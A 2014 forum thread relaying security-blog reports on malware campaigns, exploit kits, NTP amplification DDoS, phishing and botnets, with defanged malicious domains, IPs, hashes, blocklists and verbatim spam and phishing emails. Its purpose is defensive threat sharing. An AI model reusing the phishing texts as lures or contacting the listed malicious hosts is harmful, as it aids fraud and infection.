188.138.90.222 – The following domains are also known to have responded to the same IP: rimwaserver .com; notslead .com; adwenia .com – Email: philip.woronoff@ yandex .ru (also known to have responded to 188.138.74.38 in the past; as well as digenmedia .com)
Based on BrightCloud’s database, not only is adservinghost1 .com already flagged as malicious, but also, we’re aware that MD5: dc35b211b5eb5bd8af02c412e411d40e (Rogue:Win32/Winwebsec)* is known to have phoned back to the same IP as the actual domain, hxxp ://212.124.112.232 /cb_soft.php?q=dcee08c46ea4d86769a92ab67ff5aafa in particular...
> https://www.webroot.com/blog/wp-content/uploads/2014/02/DoubleClick_Malvertising.png
Here comes the interesting part. Apparently, the name servers of adservinghost1 .com are currently responding to the same IPs as the name servers of the Epom ad platform.
NS1.ADSERVINGHOST1 .COM – 212.124.126.2
NS2.ADSERVINGHOST1 .COM – 74.50.103.38
... domains are also responding to the same IP as the Epom .com domain at 198.178.124.5 ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/76f5cc93794620c1808077fef71b1a1d43b6b63a5d2b2e62c2f4af60f57f7bbb/analysis/
___

Malware sites to block 14/2/14
- http://blog.dynamoo.com/2014/02/malware-sites-to-block-14214.html
14 Feb 2014 - "This bunch of OVH Canada hosted nameserver and IP ranges are supporting malware distribution via the Nuclear Exploit Kit (as described here* by Umbrella Labs). OVH Canada have a long history with this bad actor (who I believe to be r5x .org), and these /29 and /30 blocks spread throughout OVH's range make it more difficult to block the IPs. Are OVH providing snowshoe malware distribution services? It does look like it. Perhaps OVH can prove me wrong by banishing this bad customer once and for all. First of all, we have a set of nameservers being used to support mostly .pw domains hosting the Nuclear EK. The nameservers I can see that are active... (Long list at the dynamoo URL above)
Those nameservers are hosted in the following ranges, exclusively supplied by OVH Canada. If you are in a security-sensitive environment then I would recommend using larger blocks.
142.4.194.0/29
192.95.6.24/29
192.95.10.16/29
192.95.46.56/30
192.95.46.60/30
192.95.47.232/30
192.95.47.236/30
198.50.164.240/30
198.50.172.64/30
198.50.172.68/30
198.50.172.72/30
198.50.172.76/30
198.50.197.28/30
198.50.197.48/30
198.50.197.52/30
198.50.197.56/30
198.50.197.60/30
198.50.204.240/30
198.50.204.244/30
198.50.212.172/30
198.50.219.240/30
198.50.219.248/30
198.50.224.240/30
198.50.235.196/30
198.50.242.120/30
198.50.246.240/30
198.50.247.248/30
198.50.247.252/30
198.50.251.168/30
198.50.251.172/30
I can see the following domains being actively supported by these nameservers, all of which should be considered hostile..." (Long list at the dynamoo URL above)

* http://labs.umbrella.com/2014/02/14/when-ips-go-nuclear/
Feb 14, 2014
___

Fake Flash install via Silverlight
- http://community.websense.com/blogs/securitylabs/archive/2014/02/14/fakeflash-installation-via-silverlight.aspx
Feb 14, 2014 - "... discovered attempts to infect users using the commonly distributed plug-in, Silverlight. Silverlight allows development of web and mobile applications that consist of streaming media, multimedia, graphics, and animation. It has been used for video streaming of events such as the 2008 Summer Olympics in Beijing, the 2010 Winter Olympics in Vancouver, and the 2008 conventions of both major United States political parties. Streaming services such as Netflix use Silverlight for Digital Rights Management (DRM). By leveraging two Silverlight plug-in vulnerabilities, CVE-2013-3896 and CVE-2013-0074, attackers have been able to infect victims via dropper files and subsequently through calls home to the command and control (C&C) server... the plug-in is a Base64 encoded Visual Basic Script (VBS). Silverlight generates the VBS file and places it in the directory C:\Users\<user name>\AppData\Local\Temp\Log... The downloaded binary is encrypted with the XOR key “m3S4V”. Using the ADODB.Stream ability to read and write text and binary files, a file named 4bb213.exe is created and run... At the time of initial investigation, fewer than 10% of AV vendors* had detection for the malicious files. The dropper files involved in this campaign are currently being identified as a Trojan threat by AV vendors. Based on call back activity, infected machines may be updated with additional dropper files by the C&C server when communication is established. The C&C server hosting the dropper file was registered via a domain privacy provider, while the resolving IP address is owned by the hosting provider 3NT Solutions. Communication attempts to the C&C server have been observed from the following countries:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/0407.blog007.png
While Silverlight is not commonly used for business purposes, its use for web applications and streaming gives it a strong presence on devices owned by everyday users. With many companies embracing BOYD policies, applications such as Silverlight provide malicious actors with another potential cyber-attack vector..."
* https://www.virustotal.com/en/file/e58a6e7c1b0d558c1e3abc249664c9cb1e15d75a1c57a20b3720e95e46c9ff77/analysis/

Silverlight current version: 5.1.20913.0 - http://www.microsoft.com/silverlight/

MS13-087
- http://technet.microsoft.com/en-us/security/bulletin/ms13-087
Oct 08, 2013 - "... upgrades previous versions of Silverlight to Silverlight version 5.1.20913.0..."

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0074 - 9.3 (HIGH)

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3896 - 4.3

:fear::fear: :mad: :fear:

AplusWebMaster
2014-02-16, 15:22
FYI...

400Gbps DDoS attacks ...
- http://atlas.arbor.net/briefs/index#411367071
High Severity
13 Feb 2014
NTP reflection/amplification attacks continue to gain momentum. Indicators of attacks up to 400Gbps have been discussed. Mitigations are ongoing, however the situation is still volatile.
Analysis: Despite multiple efforts to notify those running NTP servers that are not yet up to date and allow for a much larger amplification attack, the number of NTP servers that function beautifully as attack amplification sources is still quite high. Stressor services are known to implement NTP amplification attacks (along with SNMP and DNS amplification attacks and likely others) and lists of vulnerable NTP servers are shared on underground forums, leading to many copycat attacks. Several NTP amplification attack scripts have been shared on underground forums and elsewhere which makes this attack within easy reach of anyone who has a system that can originate spoofed traffic...

- https://www.us-cert.gov/ncas/alerts/TA14-013A
Last revised: Feb 05, 2014 - "... all versions of ntpd prior to 4.2.7 are vulnerable... upgrade all versions of ntpd that are publically accessible to at least 4.2.7... where it is not possible to upgrade the version of the service, it is possible to -disable- the monitor functionality in earlier versions of the software. To disable “monlist” functionality on a public-facing NTP server that cannot be updated to 4.2.7, add the “noquery” directive to the “restrict default” line in the system’s ntp.conf, as shown below:
restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery "

- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5211 - 5.0
Last revised: 01/24/2014 - "... as exploited in the wild in December 2013."

>> http://www.ntp.org/downloads.html
2014/02/10 - 4.2.7p421

NTP attacks continue ...
- http://www.arbornetworks.com/asert/2014/03/ntp-attacks-continue-a-quick-look-at-traffic-over-the-past-few-months/
3/10/2014
___

FTP sites compromised to serve malware and scams
- https://net-security.org/malware_news.php?id=2709
Feb 14, 2014 - "Some 7,000 FTP sites and servers have been compromised to serve malware, and its administrators are usually none the wiser... FTP sites function as online file caches and are accessible remotely - usually via Web browsers. Users who have the required login credentials can upload and download files from them, but other users can also retrieve certain files hosted on such a server if given a specific link that leads to the file (and without needing to provide login credentials). It is this latter capacity that makes login credentials to FTP servers a prized haul for cyber scammers, as they upload malware and malicious links to the server, then embed direct links to them in spam emails delivered to potential victims. Access to a FTP server can also be occasionally leveraged by the attackers to compromise connected web services. "The victim companies hosting exploited FTP sites are spread across the spectrum – from small companies and individual accounts with ISPs to major multi-national corporations," noted the researchers*. "Hackers planted PHP scripts armed with backdoors (shells) and viruses in multiple directories hoping that these directories map to web servers of the victim companies to gain control of the web services. They also uploaded HTML files with seamless re-directs to malicious sites"... It is unknown who stole the FTP credentials, and who is using them, but judging by the complexity of some of the passwords, it's natural to assume that they haven't been guessed, but stolen via information-stealing malware. Also, some sites have default or publicized login credentials, so exploitation of them is easy."
* http://www.holdsecurity.com/#!news2013/c13i1
Feb 13, 2014
___

Fake "Account Credited" / TTCOPY.jar SPAM
- http://blog.dynamoo.com/2014/02/account-credited-ttcopyjar-spam.html
16 Feb 2014 - "This spam email comes with a malicious .JAR attachment:
From: Tariq Bashir muimran@ giki .edu .pk
Reply-To: Tariq Bashir [ta.ba@ hot-shot .com]
Date: 15 February 2014 11:03
Subject: Account Credited
Dear Sir,
I am sorry for my late response; our bank has credited 50% of Total amount on invoice to your bank account, the balance will be paid against BOL.
Find attached Bank TT and update us on delivery schedule.
Regards,
Tariq Bashir
Remal Al Emarat Travel & Tourism L.L.C.
Al Muteena Street, Salsabeel Building, 103
P.O. Box 56260, Dubai, UAE
Tel: +971 4 271 54 06
Fax: +971 4 271 50 65
Mobile: +971 50 624 62 05
e-mail: ta.ba@ hot-shot .com

The spam email originates from 121.52.146.226 (mail.giki .edu .pk) and comes with a malicious attachment TTCOPY.jar which is a Java application. This has a VirusTotal detection rate of 12/50* and the Malwr analysis reports** an attempted connection to clintiny.no-ip .biz on 67.215.4.123 (GloboTech, Canada / MaXX Ltd, Germany). Although this is an unusual threat, Java attacks are one of the main ways that an attacker will gain access to your system. I strongly recommend -deinstalling- Java if you have it installed. I can find two highly suspect IP blocks belonging to MaXX Ltd which I recommend blocking, along with the domains specified below:
67.215.4.64/28
67.215.4.120/29
u558801.nvpn .so
jagajaga.no-ip .org
jazibaba.no-ip .org
cyberx2013.no-ip .org
deltonfarmhouse.no-ip .biz
deltoncowstalls.no-ip .org
can2-pool-1194.nvpn .so
jazibaba1.no-ip .biz
ns2.rayaprodserver .com
kl0w.no-ip .org
jajajaja22.no-ip .org
mozillaproxy.zapto .org "
* https://www.virustotal.com/en/file/f74df04a59a11739361f522d245d089f7418fdc508e1f73e06b13c1d2b30b61e/analysis/1392589951/

** https://malwr.com/analysis/Y2I2MDcxYWUyMTRlNGE0YzhiNjk0YzE1M2QwNTAyNjI/

- https://www.virustotal.com/en-gb/ip-address/67.215.4.123/information/

:fear::fear:

AplusWebMaster
2014-02-17, 23:38
FYI...

Fake Evernote SPAM
- http://blog.dynamoo.com/2014/02/fake-evernote-image-has-been-sent-spam.html
17 Feb 2014 - "... the RU:8080 gang appears to have been back for a while, but I haven't had a lot of samples.. here's a new one...
Date: Mon, 17 Feb 2014 16:19:40 -0700 [18:19:40 EST]
From: accounts@ pcfa .co .in
Subject: Image has been sent
Image has been sent.
DSC_990341.jpg 33 Kbytes
Go To Evernote
Copyright 2014 Evernote Corporation. All rights reserved

The links in the email go to:
[donotclick]www.aka-im .org/1.html
[donotclick]bluebuddha .us/1.html
Which in turn loads a script from:
[donotclick]merdekapalace .com/1.txt
[donotclick]www.shivammehta .com/1.txt
That in turn attempts to load a script from [donotclick]opheevipshoopsimemu .ru:8080/dp2w4dvhe2 which is multihomed on the following IPs:
31.222.178.84 (Rackspace, UK)
37.59.36.223 (OVH, France)
54.254.203.163 (Amazon Data Services, Singapore)
78.108.93.186 (Majordomo LLC, Russia)
78.129.184.4 (Iomart Hosting, UK)
140.112.31.129 (TANET, Taiwan)
180.244.28.149 (PT Telkom Indonesia, Indonesia)
202.22.156.178 (Broadband ADSL, New Caledonia)
The URLquery report* on the landing site indicates a possible Angler Exploit Kit, although the code itself is hardened against analysis. There are a number of other hostile sites on those same IPs... I would recommend blocking the following IPs and domains:
31.222.178.84
37.59.36.223
54.254.203.163
78.108.93.186
78.129.184.4
140.112.31.129
180.244.28.149
202.22.156.178
afrikanajirafselefant .biz
bakrymseeculsoxeju .ru
boadoohygoowhoononopee .biz
bydseekampoojopoopuboo .biz
jolygoestobeinvester .ru
noaphoapofoashike .biz
opheevipshoopsimemu .ru
ozimtickugryssytchook .org
telaceeroatsorgoatchel .biz
ypawhygrawhorsemto .ru
aka-im .org
bluebuddha .us
merdekapalace .com
shivammehta .com "
* http://urlquery.net/report.php?id=9484541
___

Fake Evernote emails serve client-side exploits ...
- http://www.webroot.com/blog/2014/02/18/spamvertised-image-sent-evernote-themed-campaign-serves-client-side-exploits/
Feb 18, 2014 - "Cybercriminals continue to populate their botnets, with new infected hosts, through the persistent and systematic spamvertising of tens of thousands of fake emails which impersonate popular and well known brands – all in an attempt to socially engineer prospective victims into interacting with the scam. We’ve recently intercepted a currently circulating malicious spam campaign, impersonating Evernote, serving client-side exploits to prospective victims who click on the links found in the -fake- emails...
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2014/02/Evernote_Malware_Malicious_Software_Client_Side_Exploits_Spam_Spamvertised.png
Sample redirection chain: hxxp ://nortonfire .co .uk/1.html (82.165.213.55) -> hxxp ://merdekapalace .com/1.txt – 202.71.103.21 -> hxxp ://www.shivammehta .com/1.txt – 181.224.129.14 -> hxxp ://ypawhygrawhorsemto .ru:8080/z4ql9huka0
Domain name reconnaissance for the fast-fluxed ypawhygrawhorsemto .ru:
37.59.36.223
180.244.28.149
140.112.31.129
31.222.178.84
54.254.203.163
78.108.93.186
202.22.156.178
54.254.203.163
78.108.93.186
140.112.31.129
202.22.156.178
31.222.178.84
37.59.36.223
180.244.28.149
Responding to 78.108.93.186, are also the following malicious domains:
ypawhygrawhorsemto .ru – 78.108.93.186
jolygoestobeinvester .ru – 78.108.93.186
afrikanajirafselefant .biz – 78.108.93.186
bakrymseeculsoxeju .ru – 78.108.93.186
ozimtickugryssytchook .org – 78.108.93.186
bydseekampoojopoopuboo .biz – 78.108.93.186
Name servers used in the campaign:
Name server: ns1.ypawhygrawhorsemto .ru – 173.255.243.199
Name server: ns2.ypawhygrawhorsemto .ru – 119.226.4.149
Name server: ns3.ypawhygrawhorsemto .ru – 192.237.247.65
Name server: ns4.ypawhygrawhorsemto .ru – 204.232.208.115 ...
Detection rate for a sample served client-side exploit:
MD5: c81b2b9fbee87c6962299f066b983a46*
Domain name reconnaissance for the fast-fluxed opheevipshoopsimemu .ru:
31.222.178.84
180.244.28.149
78.108.93.186
140.112.31.129
78.129.184.4
54.254.203.163
202.22.156.178
37.59.36.223
Name servers part of the campaign’s infrastructure:
Name server: ns1.opheevipshoopsimemu .ru. 173.255.243.199
Name server: ns2.opheevipshoopsimemu .ru. 119.226.4.149
Name server: ns3.opheevipshoopsimemu .ru. 192.237.247.65
Name server: ns4.opheevipshoopsimemu .ru. 204.232.208.115 ..."
* https://www.virustotal.com/en/file/c8e571de80affa42d3d062ba387a9d14716e869a9826e1048cdf17cc98771e46/analysis/

:fear::fear: :mad:

AplusWebMaster
2014-02-19, 14:20
FYI...

Phishing Scam – 'Apple ID Used to Download OS X Mavericks' Email
- http://www.hoax-slayer.com/mavericks-download-apple-id-phishing-scam.shtml
Feb 19, 2014 - "Email purporting to be from the Apple Security Department warns recipients that their Apple ID was used to download OS X Mavericks and urges them to open an attached file to confirm their accounts if they did not initiate the download. The email is -not- from Apple. It is a phishing scam designed to trick users into giving their Apple account login details and financial information to criminals. The attached file contains a -bogus- HTML form that requests account and credit card details. Example:
Dear Apple Customer,
Your Apple ID, was just used to download OS X Mavericks from the Mac App
Store on a computer or device that had not previously been associated with
that Apple ID.
This download was initiated from Spain.
If you initiated this download, you can disregard this email. It was only
sent to alert you in case you did not initiate the download yourself.
If you did not initiate this download, you have to confirm your account and
validate your informations, so we recommend you to :
1- Download the attached document and open it in a secure browser.
2- Follow the verification process to protect your account.
Your sincerely.
Apple Security Department.
Apple Support

This email, which purports to be from Apple's Security Department, warns recipients that their account was used to download a copy of OSX Mavericks from a computer or device not previously associated with their Apple ID. The message claims that the download was initiated from Spain. It suggests that, if recipients did not initiate the download, they should open an attached file to confirm their account and validate their 'informations'. However, the email is -not- from Apple and the warning about an unauthorized download is designed to trick people into opening the attached file. The attachment contains a HTML form that lodes in the user's browser when opened. The -bogus- form first asks for the user's Apple account login details. It then asks for ID and credit card information, ostensibly so that the user's account can be verified and 'protected'. All the information submitted on the fake from can be harvested by criminals and used to hijack the real Apple accounts belonging to victims. The criminals may also conduct fraudulent credit card transactions and try to steal the identities of victims. The scammers responsible for the email hope that at least a few recipients will be panicked into opening the attachment and supplying the requested information in the mistaken belief that their Apple ID has been compromised. Like other high profile companies, Apple is almost continually targeted in phishing campaigns. Apple will never send you an unsolicited email that asks you to login and verify account details by clicking a link or opening an attached file."

___

'Product Testing UK' Facebook Survey Scam
- http://www.hoax-slayer.com/product-testing-survey-scam.shtml
Feb 19, 2014 - "Facebook messages originating from a Facebook Page called 'Product Testing UK' claim that testers are needed for iPhones and other products and invite users to click a link to fill in a 'Product Testing Application Form'... The messages and associated Facebook Page are part of a survey scam. The 'Application Form' link takes users to suspect third party survey websites that ask them to provide personal information to go in the draw for various prizes. Users will never get to test and keep the promised products. Do -not- click any links in these scam messages. Example:
PRODUCT TESTER NEEDED
Get brand new iPhone for Review it! Test it! Rate it & you will keep it!
CLICK HERE TO REGISTER YOURSELF-->[Link Removed]
*PRODUCT IS GIVING ACCORDING TO FIRST COME FIRST GET BASIS AND OFFER FOR ONLY UK.
> http://www.hoax-slayer.com/images/product-testing-uk-scam-1.jpg
According to messages currently appearing on Facebook, users can sign up as product testers for iPhones and other tech products by following a link and filling in an application form. The messages come from a Facebook Page called 'Product Testing UK'. The messages claim that users can keep the product they test after the testing process is over. However, the claims in the posts are -lies- and the Page is fraudulent. Those who click the link will not be taken to a 'Product Testing Application Form' as claimed.Instead, they will be redirected to various suspect 'survey' or 'offer' websites that promise the chance to win prizes in exchange for providing personal information. Some of the pages ask users to provide name, address and contact details, supposedly to allow them to go in the draw for a prize. Others will claim that users must provide their mobile phone number - thereby subscribing to absurdly expensive text messaging services - in order to get the results of a survey or go in the running for a prize. Users will be trapped in a confusing tangle of open webpages, all offering supposedly free gifts or services in exchange for participating. Often, trying to exit the pages will call up various pop-ups that try to convince the person to stay on the page rather than navigate away. The people who set up these scams earn a commission via dodgy affiliate marketing schemes whenever one of their victims completes an 'offer' or 'survey'. And, alas, no matter how many surveys or offers users complete, they will never get to fill in the product testing application form. Nor, of course, will they ever get to test and keep one of the promised testing products..."
___

Malicious mobile apps on Google Play up 400 percent
- https://net-security.org/malware_news.php?id=2713
Feb 19, 2014 - "RiskIQ* announced research findings on the presence of malicious apps contained in the Google Play store. The company found that malicious apps have grown 388 percent from 2011 to 2013, while the number of malicious apps removed annually by Google has -dropped- from 60% in 2011 to 23% in 2013. Apps for personalizing Android phones led all categories as most likely to be malicious. The most downloaded -malicious- app in 2013 was Talking Angela..."
* http://www.riskiq.com/company/press-releases/riskiq-reports-malicious-mobile-apps-google-play-have-spiked-nearly-400

:fear: :mad:

AplusWebMaster
2014-02-20, 14:45
FYI...

Cushion redirect on 62.212.128.22
- http://blog.dynamoo.com/2014/02/suspect-cushion-redirect-on-6221212822.html
20 Feb 2014 - "... there is an apparent cushion redirect running on 62.212.128.22 (XenoSite, Netherlands) using hijacked GoDaddy domains (which is never a good sign). An example can be found with this URLquery report* but in this case it seems to end up at a wallpaper site (picture here**). VirusTotal sees the IP*** as being somewhat suspect. Given that this is abusing subdomains of legitimate GoDaddy domains then on balance I would regard this as being malicious. All the subdomains I can find are listed here**** [pastebin], but they are all covered by this recommended blocklist:
46.231.87.57
310casting .com
analacrobatsfree .com
dovizpiyasa .net
dovmeara .com
dovmebakirkoy .com
dovmeblog .com
dovmeci .co
dovmeciadresleri .com
dovmecibul .com
dovme-resimlerim .com "
* http://urlquery.net/report.php?id=9546681

** http://urlquery.net/screenshot.php?id=9546681

*** https://www.virustotal.com/en-gb/ip-address/62.212.128.22/information/

**** http://pastebin.com/4UhwdY3a
___

Exploit Kits in Fake Skype, Evernote Themed Attacks
- http://community.websense.com/blogs/securitylabs/archive/2014/02/19/cyber-criminals-ramp-up-use-of-angler-and-goon-exploit-kits.aspx
Feb 19, 2014 - "... recent campaigns were themed around fake -Skype- voicemail notifications (Feb 19, 2014), and fake -Evernote- image notifications (Feb 7, 17-18, 2014). The emails try to lure the victim to click a link that will redirect through an intermediate site into pages that host the Angler Exploit Kit (later switched to "Goon" Exploit kit). The kits will exploit Java, Flash or Silverlight vulnerabilities and try to load an encrypted executable, to help evade detection...
Fake Skype messages:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/5100.mal_5F00_skype_5F00_angler_5F00_EK.jpg
Fake Evernote Messages:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/4544.mal_5F00_evernote_5F00_ru_5F00_8080_5F00_angler_5F00_EK1.jpg
... Checking in Virus Total to provide context about AV coverage for this malware, we can see detection when first seen is 7/50*, and it looks like a Zeus variant...
* https://www.virustotal.com/en/file/9ca2c2585fdc866d2c402d2c23ce3c266f1c953aef2f3e09667d70855f9be822/analysis/1392844805/
... We have seen evidence and reports of the "ru:8080" gang switching to Angler Exploit Kit as far back as December 2013... The "ru:8080" criminal gang typically pushes trojans such as Cridex, Zeus GameOver, Click-Fraud trojans like ZeroAccess, and we have seen instances in the past of Ransomware such as RansomLock and worms like Andromeda. It looks like after a period of relatively little use of exploit kits, cyber criminals resume use of different exploit kits to deliver malware in email based attacks. However, the switch from one exploit kit to the other indicates several possibilities, one being that continuing to use a single Malware-as-a-Service for a long period is deemed too risky to maintain a profitable operation. Alternatively, the attackers are evaluating multiple exploit kits to determine which works the best, or multiple attackers may be leveraging the same bot-net and redirect structures... we see a relatively heavy bias from the attackers towards targets located in the UK, followed by US and Germany:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/5415.Angler_5F00_ru_5F00_8080_5F00_lures_5F00_targets.jpg "
___

Zeus banking Trojan - back with another variant, ZeusVM
- http://www.theinquirer.net/inquirer/news/2329754/zeus-banking-trojan-is-back-with-another-variant-zeusvm
Feb 19 2014 - "... Dubbed ZeusVM, the modded version of the infamous Trojan is being distributed in many different ways, but typically through phishing emails or web-based attacks, including "malvertising", whereby people are infected by visiting websites containing malicious ads. "The Zeus/Zbot Trojan is one the most notorious banking Trojans ever created; it's so popular it gave birth to many offshoots and copycats," Malwarebytes* said in a blog post... Malwarebytes senior security researcher Jerome Segura explained that there are various parts to this piece of malware. While the main executable - the bot - will bury itself into your computer and ensure it is reactivated every time you reboot, at regular intervals it also checks with its command and control server for new instructions while monitoring user activity... It can also perform wire transfers while the victim is logged in, Segura said, and even alter the appearance of the current account balance to ensure that it remains unnoticed... Fireeye has said that hackers are dropping standard malware like Zeus in favour of more advanced but harder to use remote access Trojans (RATs) such as Xtreme RAT... Xtreme RAT is a notorious RAT that has been freely available on a number of cyber black markets since June 2010. The RAT is dangerous as it can be used for a variety of purposes, including interacting with the victim machine via a remote shell, uploading and downloading files, interacting with the registry and manipulating running processes and services."
* http://blog.malwarebytes.org/security-threat/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/

:fear::fear: :mad:

AplusWebMaster
2014-02-21, 15:00
FYI...

Something evil on 74.50.122.8, 5.61.36.231 and 94.185.85.131
- http://blog.dynamoo.com/2014/02/something-evil-on-74501228-56136231-and.html
21 Feb 2014 - "Thanks to @Techhelplistcom for the heads up on this little mystery..
> http://3.bp.blogspot.com/-N6rkvf8I25o/UwcxH4K-quI/AAAAAAAACnU/OO02e4N6OhI/s1600/techhelplist.png
It all starts with a spam evil (described here*).. The link goes to a URLquery report that seems pretty inconclusive**, mentioning a URL of [donotclick]overcomingthefearofbeingfabulous .com/xjvnsqk/fbktojkxbxp.php [an apparently poorly secured*** server at 74.50.122.8, Total Internet Solutions Pvt. Ltd in India] that just does a redirect to a spammy diet pill site at thefxs .com [94.177.128.10, Linkzone Media Romania] if you have a Windows User Agent set. As Techhelplist says, set the UA to an Android one**** and you get a very different result. In this case you get bounced to a site hosted on 5.61.36.231 (3NT Solutions / Inferno .name)
[donotclick]mobile.downloadadobecentral .ru/FLVupdate.php then to
[donotclick]mobile.downloadadobecentral .ru/FLVupdate2.php from where it attempts to download a file FlashUpdate.apk . 3NT Solutions / inferno .name is a known bad actor[5] and you should block all their IPs on sight, in this case they have a netblock 5.61.32.0/20 which I strongly recommend that you route to the bitbucket. FlashUpdate.apk has a VirusTotal detection rate of 22/47[6], but most Android users are probably not running anti-virus software. The Andrubis analysis[7] of that .apk shows a network connection to 94.185.85.131 (Netrouting Telecom, Sweden) plus (oddly) some pages loaded from ticketmaster .com. It just goes to show that what you think might be harmless spam can actually be something very, very different if you access it on a mobile device.
Recommended blocklist:
5.61.32.0/20
94.177.128.10
74.50.122.8
94.185.85.131
downloadadobecentral .ru
jariaku .ru
350600700200 .ru
overcomingthefearofbeingfabulous .com "

* http://techhelplist.com/index.php/spam-list/477-some-random-android-malware-that-just-showed-up-one-day

** http://www.urlquery.net/report.php?id=9558246

*** https://www.virustotal.com/en/ip-address/74.50.122.8/information/

**** http://www.useragentstring.com/pages/Android%20Webkit%20Browser/

[5] http://blog.dynamoo.com/search/label/Iran

[6] https://www.virustotal.com/en-gb/file/88e772f4eb3ddd9c3010d16572b859dbbe30f01b5eec53722912073d3193b17b/analysis/1392977002/

[7] http://anubis.iseclab.org/?action=result&task_id=137700884db074714e1ec9508b977d314&format=html
___

Zeus variant targets Salesforce .com accounts, SaaS applications
- http://atlas.arbor.net/briefs/index#1152292298
Elevated Severity
20 Feb 2014
The Zeus malware - typically used as a banking trojan - was used to copy data from Salesforce .com after infecting a vulnerable home machine.
Analysis: Researchers speculate that pharming - redirecting traffic by manipulating settings such as hosts files on target systems and DNS servers in infrastructure gear - may have been a vector. Considering the home machine was most likely connected via a broadband router, it is possible that the router was exploited however enough information is not yet available to determine this. Initial indicators suggest that Zeus and other contemporary banking trojans in general have not been used to target Salesforce, therefore this maybe a targeted attack, or an opportunistic attack that was leveraged in a more targeted manner once the threat actors understood the value of the compromised asset. It is also possible that access to this particular machine was purchased in the underground once a potentially opportunistic attacker realized they could sell access to other threat actors who have more strategic goals.
Source: http://www.zdnet.com/zeus-variant-targets-salesforce-com-accounts-saas-applications-7000026557/
___

Fake inTuit TurboTax email - "Issue on Your Refund"
- http://security.intuit.com/alert.php?a=99
2/20/14 - "People are receiving -fake- emails with the title "Issue on Your Refund". Below is a copy of the email people are receiving.
> http://security.intuit.com/images/tt2014phish.jpg
This is the end of the -fake- email.
Steps to Take Now
Do -not- open any attachment or -click- any links in the email...
Delete the email."
.

:mad: :fear:

AplusWebMaster
2014-02-22, 14:41
FYI...

Attack code exploits critical bug in majority of Android phones
- http://atlas.arbor.net/briefs/index#610868271
Elevated Severity
Feb 20, 2014
Public exploit code has been released for a 14 month old vulnerability in a large number of Android devices. The exploit code is trivial to use and is freely available in the Metasploit Framework.
Analysis: The slow update cycle for Android devices is a serious security consideration. Combining the risks of the typical BYOD work environment and the popularity of accessing enterprise resources with personal devices, such publicly released exploit code will make it easier for targeted attacks to leverage a compromised Android device in attack campaigns. The video that demonstrates the exploit shows the -malicious- URL being delivered to the device in the form of a QR code - an attack vector previously discussed but rarely observed... Apparently using an alternate browser other than the built-in Android browser (based on WebView) such as Google Chrome will -mitigate- this vulnerability, however many users are likely to be taking advantage of the default configuration which includes a WebView based browser...
Source: http://arstechnica.com/security/2014/02/e-z-2-use-attack-code-exploits-critical-bug-in-majority-of-android-phones/

:fear: :mad:

AplusWebMaster
2014-02-24, 15:48
FYI...

Fake PayPal email - wants card details ...
- http://blog.malwarebytes.org/fraud-scam/2014/02/fake-paypal-survey-program-email-wants-card-details/
Feb 24, 2014 - "Be wary of emails bearing gifts – in this case, claiming to reward those who would fill in a so-called Paypal survey to obtain a “£25 reward”. This one is flagged as -spam- in Gmail, but depending on your mail provider it may creep into the Inbox instead of the Spam folder:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/paypalsurveyspam1.jpg
... The zipfile, online_form.zip, contains a .htm page which looks like this:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/paypalsurveyspam2.jpg
Underneath the entirely pointless “survey questions”, the form asks for name, address, city, postcode, birthday, the “£25 bonus code” and full debit card information which all sits above a handy “Submit” button (top tip: -don’t- hit the submit button). While the people sending this mail have presumably tried to panic recipient into replying quickly (that is one seriously tight deadline), they may find this backfires as would-be victims see “23 February 2014” and send it straight to the trash. Take note of the following advice from the PayPal Security Center*:
* https://www.paypal.com/c2/cgi-bin/webscr?cmd=xpt/Marketing/securitycenter/general/UnderstandPhishing-outside
"To help you better identify fake emails, we follow strict rules. We will -never- ask for the following personal information in email:
Credit and debit card numbers
Bank account numbers
Driver’s license numbers
Email addresses
Passwords
Your full name”
If it sounds too good to be true…"
___

Pony botnet steals bitcoins, digital currencies
- http://blog.spiderlabs.com/2014/02/look-what-i-found-pony-is-after-your-coins.html
Feb 24, 2014 - "... discovered yet another instance of a Pony botnet controller. Not only did this Pony botnet steal credentials for approximately 700,000 accounts, it’s also more advanced and collected approximately $220,000 (all values in this post will be in U.S. dollars) worth, at time of writing, of virtual currencies such as BitCoin (BTC), LiteCoin (LTC), FeatherCoin (FTC) and 27 others. According to our data, the cyber gang that was operating this Pony botnet was active between September 2013 and mid-January 2014. In this ~4 month period, the botnet managed to steal over 700,000 credentials, distributed as follows:
~600,000 website login credentials stolen
~100,000 email account credentials stolen
~16,000 FTP account credentials stolen
~900 Secure Shell account credentials stolen
~800 Remote Desktop credentials stolen
... the one thing you need to know is that BitCoins are stored in virtual wallets, which are essentially pairs of private and public keys. Whoever holds the private key to a wallet is the owner of that wallet and no name, ID or history is associated with the wallet. Again, possession of the private key indicates ownership. This holds true for all the other digital currencies that grew from BTC and now live alongside it—the most popular alternative right now being LiteCoin. BTC started out as an underground currency... The value of a BitCoin fluctuates. As of February 24; a BitCoin is valued at approximately $600. Unfortunately, even though some people may have had more money in their virtual wallet than they did in their bank account, very few had the understanding of how to properly secure their wallets... cybercriminals began developing ways to steal BitCoins, each within their own field of expertise. The most obvious choice for an attacker is to go after websites that offer various trading services. Many of these websites store virtual wallets for their users. A number of attacks on trading websites have popped-up over time. One of the most famous attacks on a trading website was the Sheep Marketplace scam** because of the large amount of BTC stolen... the bots interacted directly with the command-and-control server, which provided us with a little more insight into the geographical distribution of the victims:
Stolen passwords geo location destribution
> http://a7.typepad.com/6a0168e94917b4970c01a73d793ddf970d-pi
... most popular websites for which credentials were stolen...
Stolen passwords by domains
> http://a5.typepad.com/6a0168e94917b4970c01a5116de6e5970c-pi
